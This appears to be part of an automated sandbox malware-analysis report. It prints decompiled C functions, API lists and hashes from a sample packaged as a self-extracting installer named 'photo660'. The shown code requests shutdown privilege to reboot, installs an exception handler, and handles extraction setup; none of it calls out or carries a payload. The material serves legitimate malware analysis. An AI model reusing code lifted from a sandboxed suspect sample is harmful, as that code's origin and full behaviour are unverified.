                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1daf4c0e7212e6dd285d5a6c32ce93390c9fe848ace84f334960e48f7e7b1f20
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2D10671A04A555EDB358B3C8C88FFA7BE1EB1A305F1841EED4C6D7191DA70AEC28B11
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E00BC1F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0xbc9a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0xbc8004; // 0x9f7d84ca
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E00BC44B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00BC6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E00BC44B9(0, 0x522, 0xbc1140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00BC1EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

















                                                                                                                                                                                                        0x00bc1f90
                                                                                                                                                                                                        0x00bc1f90
                                                                                                                                                                                                        0x00bc1f93
                                                                                                                                                                                                        0x00bc1f98
                                                                                                                                                                                                        0x00bc1fa4
                                                                                                                                                                                                        0x00bc1fa7
                                                                                                                                                                                                        0x00bc1fc5
                                                                                                                                                                                                        0x00bc1fcd
                                                                                                                                                                                                        0x00bc1fdb
                                                                                                                                                                                                        0x00bc1ee5
                                                                                                                                                                                                        0x00bc1eea
                                                                                                                                                                                                        0x00bc1ef1
                                                                                                                                                                                                        0x00bc1ef4
                                                                                                                                                                                                        0x00bc1f0c
                                                                                                                                                                                                        0x00bc1f2e
                                                                                                                                                                                                        0x00bc1f3a
                                                                                                                                                                                                        0x00bc1f46
                                                                                                                                                                                                        0x00bc1f4d
                                                                                                                                                                                                        0x00bc1f58
                                                                                                                                                                                                        0x00bc1f60
                                                                                                                                                                                                        0x00bc1f61
                                                                                                                                                                                                        0x00bc1f62
                                                                                                                                                                                                        0x00bc1f75
                                                                                                                                                                                                        0x00bc1f80
                                                                                                                                                                                                        0x00bc1f77
                                                                                                                                                                                                        0x00bc1f77
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1f77
                                                                                                                                                                                                        0x00bc1f64
                                                                                                                                                                                                        0x00bc1f64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1f64
                                                                                                                                                                                                        0x00bc1f0e
                                                                                                                                                                                                        0x00bc1f0e
                                                                                                                                                                                                        0x00bc1f13
                                                                                                                                                                                                        0x00bc1f13
                                                                                                                                                                                                        0x00bc1f14
                                                                                                                                                                                                        0x00bc1f14
                                                                                                                                                                                                        0x00bc1f16
                                                                                                                                                                                                        0x00bc1f17
                                                                                                                                                                                                        0x00bc1f1a
                                                                                                                                                                                                        0x00bc1f1f
                                                                                                                                                                                                        0x00bc1f1f
                                                                                                                                                                                                        0x00bc1f86
                                                                                                                                                                                                        0x00bc1f8f
                                                                                                                                                                                                        0x00bc1fcf
                                                                                                                                                                                                        0x00bc1fd3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1fd3
                                                                                                                                                                                                        0x00bc1fa9
                                                                                                                                                                                                        0x00bc1fb4
                                                                                                                                                                                                        0x00bc1fbb
                                                                                                                                                                                                        0x00bc1fc3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1fc3
                                                                                                                                                                                                        0x00bc1f9a
                                                                                                                                                                                                        0x00bc1f9a
                                                                                                                                                                                                        0x00bc1fa2
                                                                                                                                                                                                        0x00bc1fd9
                                                                                                                                                                                                        0x00bc1fda
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1fa2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00BC1EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00BC1F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00BC1FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: 8713a1302874481f83ba3036ffb6906273bfa3c28ef8c9a6ea531d00fce76717
                                                                                                                                                                                                        • Instruction ID: 849190378b6600a70fe522e04a2434f124553de0f9ffbd4296c32130e6052494
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8713a1302874481f83ba3036ffb6906273bfa3c28ef8c9a6ea531d00fce76717
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C21FC71B402056BDB209BA99C4EF7F7BF8EB8B754F20085CFA02F7182DB7488019261
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC6CF0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC6CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



                                                                                                                                                                                                        0x00bc6cf7
                                                                                                                                                                                                        0x00bc6d00
                                                                                                                                                                                                        0x00bc6d19

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BC6E26,00BC1000), ref: 00BC6CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00BC6E26,?,00BC6E26,00BC1000), ref: 00BC6D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00BC6E26,00BC1000), ref: 00BC6D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00BC6E26,00BC1000), ref: 00BC6D12
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3231755760-0
                                                                                                                                                                                                        • Opcode ID: 7497387ef2177ee944a398af7904c923116632ccc3d80daac542c0ec0feb022b
                                                                                                                                                                                                        • Instruction ID: 909a6925e485233c2fd4fdf55423c5caa013a0abd82984c8cd940c6be8ae6003
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7497387ef2177ee944a398af7904c923116632ccc3d80daac542c0ec0feb022b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DD0C93200010CBFDB002BF1EC0CE593F28EB4E21AF4D4000F319E3020CE3254518B62
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E00BC3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E00BC43D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "photo660");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0xbc9a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0xbc91e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E00BC44B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0xbc91e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0xbc91e5 - 3;
						if(_t49 - 0xbc91e5 < 3) {
							goto L32;
						}
						_t24 =  *0xbc91e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0xbc91e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E00BC658A(0xbc91e4, 0x104, 0xbc1140);
								_t27 = E00BC58C8(0xbc91e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0xbc91e4 - 0x5c;
									if( *0xbc91e4 != 0x5c) {
										L30:
										_t30 = E00BC597D(0xbc91e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0xbc91e5 - 0x5c;
									if( *0xbc91e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E00BC44B9(_t64, 0x54a, 0xbc91e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0xbc91e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0xbc91e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0xbc91e4 - 0x5c;
						if( *0xbc91e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0xbc9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0xbc9a3c, 0x3e8, 0xbc8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00BC4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0xbc87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E00BC44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                        0x00bc321b
                                                                                                                                                                                                        0x00bc321e
                                                                                                                                                                                                        0x00bc3221
                                                                                                                                                                                                        0x00bc343c
                                                                                                                                                                                                        0x00bc343e
                                                                                                                                                                                                        0x00bc343f
                                                                                                                                                                                                        0x00bc3445
                                                                                                                                                                                                        0x00bc3447
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3447
                                                                                                                                                                                                        0x00bc3229
                                                                                                                                                                                                        0x00bc322a
                                                                                                                                                                                                        0x00bc322f
                                                                                                                                                                                                        0x00bc33ec
                                                                                                                                                                                                        0x00bc33f7
                                                                                                                                                                                                        0x00bc3410
                                                                                                                                                                                                        0x00bc3416
                                                                                                                                                                                                        0x00bc341d
                                                                                                                                                                                                        0x00bc342d
                                                                                                                                                                                                        0x00bc342d
                                                                                                                                                                                                        0x00bc3438
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3438
                                                                                                                                                                                                        0x00bc3237
                                                                                                                                                                                                        0x00bc3243
                                                                                                                                                                                                        0x00bc3243
                                                                                                                                                                                                        0x00bc3246
                                                                                                                                                                                                        0x00bc32ee
                                                                                                                                                                                                        0x00bc32f4
                                                                                                                                                                                                        0x00bc32f6
                                                                                                                                                                                                        0x00bc33d4
                                                                                                                                                                                                        0x00bc33d6
                                                                                                                                                                                                        0x00bc33db
                                                                                                                                                                                                        0x00bc33dc
                                                                                                                                                                                                        0x00bc33de
                                                                                                                                                                                                        0x00bc33df
                                                                                                                                                                                                        0x00bc3370
                                                                                                                                                                                                        0x00bc3372
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3372
                                                                                                                                                                                                        0x00bc32fc
                                                                                                                                                                                                        0x00bc3301
                                                                                                                                                                                                        0x00bc3301
                                                                                                                                                                                                        0x00bc3303
                                                                                                                                                                                                        0x00bc3304
                                                                                                                                                                                                        0x00bc3304
                                                                                                                                                                                                        0x00bc330a
                                                                                                                                                                                                        0x00bc330d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3313
                                                                                                                                                                                                        0x00bc3318
                                                                                                                                                                                                        0x00bc331a
                                                                                                                                                                                                        0x00bc3331
                                                                                                                                                                                                        0x00bc3332
                                                                                                                                                                                                        0x00bc333a
                                                                                                                                                                                                        0x00bc333d
                                                                                                                                                                                                        0x00bc337c
                                                                                                                                                                                                        0x00bc3388
                                                                                                                                                                                                        0x00bc338f
                                                                                                                                                                                                        0x00bc3394
                                                                                                                                                                                                        0x00bc3396
                                                                                                                                                                                                        0x00bc33a4
                                                                                                                                                                                                        0x00bc33ab
                                                                                                                                                                                                        0x00bc33b6
                                                                                                                                                                                                        0x00bc33be
                                                                                                                                                                                                        0x00bc33c3
                                                                                                                                                                                                        0x00bc33c5
                                                                                                                                                                                                        0x00bc3435
                                                                                                                                                                                                        0x00bc3437
                                                                                                                                                                                                        0x00bc3437
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3437
                                                                                                                                                                                                        0x00bc33c7
                                                                                                                                                                                                        0x00bc33c9
                                                                                                                                                                                                        0x00bc33cc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc33cc
                                                                                                                                                                                                        0x00bc33ad
                                                                                                                                                                                                        0x00bc33b4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc33b4
                                                                                                                                                                                                        0x00bc3398
                                                                                                                                                                                                        0x00bc3399
                                                                                                                                                                                                        0x00bc339b
                                                                                                                                                                                                        0x00bc339c
                                                                                                                                                                                                        0x00bc339d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc339d
                                                                                                                                                                                                        0x00bc334c
                                                                                                                                                                                                        0x00bc3351
                                                                                                                                                                                                        0x00bc3354
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc335c
                                                                                                                                                                                                        0x00bc3362
                                                                                                                                                                                                        0x00bc3364
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3366
                                                                                                                                                                                                        0x00bc3367
                                                                                                                                                                                                        0x00bc3369
                                                                                                                                                                                                        0x00bc336a
                                                                                                                                                                                                        0x00bc336b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc336b
                                                                                                                                                                                                        0x00bc331c
                                                                                                                                                                                                        0x00bc3323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3329
                                                                                                                                                                                                        0x00bc332b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc332b
                                                                                                                                                                                                        0x00bc324c
                                                                                                                                                                                                        0x00bc324c
                                                                                                                                                                                                        0x00bc324f
                                                                                                                                                                                                        0x00bc32c8
                                                                                                                                                                                                        0x00bc32ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc32ce
                                                                                                                                                                                                        0x00bc3251
                                                                                                                                                                                                        0x00bc3256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3271
                                                                                                                                                                                                        0x00bc3277
                                                                                                                                                                                                        0x00bc3279
                                                                                                                                                                                                        0x00bc3298
                                                                                                                                                                                                        0x00bc329d
                                                                                                                                                                                                        0x00bc329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc32b0
                                                                                                                                                                                                        0x00bc32b6
                                                                                                                                                                                                        0x00bc32b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc32be
                                                                                                                                                                                                        0x00bc3280
                                                                                                                                                                                                        0x00bc3289
                                                                                                                                                                                                        0x00bc328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc328e
                                                                                                                                                                                                        0x00bc327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,00BC8598,00000200), ref: 00BC3271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BC33E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00BC33F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00BC3410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 00BC3426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00BC342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00BC343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$photo660
                                                                                                                                                                                                        • API String ID: 2418873061-1456563789
                                                                                                                                                                                                        • Opcode ID: a7de3ae82d01980f23ef12aee4a61804a360db92977a1f349a92e6722f71dd0c
                                                                                                                                                                                                        • Instruction ID: 6451eb0e1e18f58b0c1ee1b933d981a8e51afd7e990056e976257da28bd366ac
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7de3ae82d01980f23ef12aee4a61804a360db92977a1f349a92e6722f71dd0c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 145127303802847BFB655B355C8DF7B2AD9DB8AF58F94C0ACF245A72D1CEA4CE019265
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00BC2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0xbc9a3c = __ecx;
				memset(0xbc9140, 0, 0x8fc);
				memset(0xbc8a20, 0, 0x32c);
				memset(0xbc88c0, 0, 0x104);
				 *0xbc93ec = 1;
				_t20 = E00BC468F("TITLE", 0xbc9154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0xbc858c = _t27;
					SetEvent(_t27);
					_t64 = 0xbc9a34;
					if(E00BC468F("EXTRACTOPT", 0xbc9a34, 4) != 0) {
						if(( *0xbc9a34 & 0x000000c0) == 0) {
							L12:
							 *0xbc9120 =  *0xbc9120 & _t65;
							if(E00BC5C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0xbc8a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0xbc8184 != 0) {
										__imp__#17();
									}
									if( *0xbc8a24 == 0) {
										_t57 = _t65;
										if(E00BC36EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0xbc9a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0xbc9a34 & 0x00000100) == 0 || ( *0xbc8a38 & 0x00000001) != 0 || E00BC18A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00BC6517(_t57, 0x7d6, _t34, E00BC19E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00BC2390(0xbc8a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E00BC44B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E00BC468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0xbc8588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0xbc9a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E00BC44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E00BC44B9(0, 0x54b, "photo660", 0, 0x10, 0);
										L11:
										CloseHandle( *0xbc8588);
										 *0xbc9124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E00BC44B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0xbc9124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00BC6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}



















                                                                                                                                                                                                        0x00bc2cb5
                                                                                                                                                                                                        0x00bc2cbc
                                                                                                                                                                                                        0x00bc2cc7
                                                                                                                                                                                                        0x00bc2cc9
                                                                                                                                                                                                        0x00bc2cd1
                                                                                                                                                                                                        0x00bc2cd3
                                                                                                                                                                                                        0x00bc2cd9
                                                                                                                                                                                                        0x00bc2ce9
                                                                                                                                                                                                        0x00bc2cf9
                                                                                                                                                                                                        0x00bc2d0e
                                                                                                                                                                                                        0x00bc2d15
                                                                                                                                                                                                        0x00bc2d1c
                                                                                                                                                                                                        0x00bc2ef3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2d2d
                                                                                                                                                                                                        0x00bc2d34
                                                                                                                                                                                                        0x00bc2d3b
                                                                                                                                                                                                        0x00bc2d40
                                                                                                                                                                                                        0x00bc2d48
                                                                                                                                                                                                        0x00bc2d59
                                                                                                                                                                                                        0x00bc2d84
                                                                                                                                                                                                        0x00bc2e1f
                                                                                                                                                                                                        0x00bc2e1f
                                                                                                                                                                                                        0x00bc2e2e
                                                                                                                                                                                                        0x00bc2e41
                                                                                                                                                                                                        0x00bc2e5a
                                                                                                                                                                                                        0x00bc2e62
                                                                                                                                                                                                        0x00bc2e6c
                                                                                                                                                                                                        0x00bc2e6c
                                                                                                                                                                                                        0x00bc2e75
                                                                                                                                                                                                        0x00bc2e77
                                                                                                                                                                                                        0x00bc2e77
                                                                                                                                                                                                        0x00bc2e84
                                                                                                                                                                                                        0x00bc2e8b
                                                                                                                                                                                                        0x00bc2e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2e96
                                                                                                                                                                                                        0x00bc2e96
                                                                                                                                                                                                        0x00bc2e9e
                                                                                                                                                                                                        0x00bc2ea2
                                                                                                                                                                                                        0x00bc2eba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2ece
                                                                                                                                                                                                        0x00bc2ede
                                                                                                                                                                                                        0x00bc2eed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2eed
                                                                                                                                                                                                        0x00bc2eef
                                                                                                                                                                                                        0x00bc2eef
                                                                                                                                                                                                        0x00bc2eef
                                                                                                                                                                                                        0x00bc2eef
                                                                                                                                                                                                        0x00bc2ea2
                                                                                                                                                                                                        0x00bc2e86
                                                                                                                                                                                                        0x00bc2e88
                                                                                                                                                                                                        0x00bc2e88
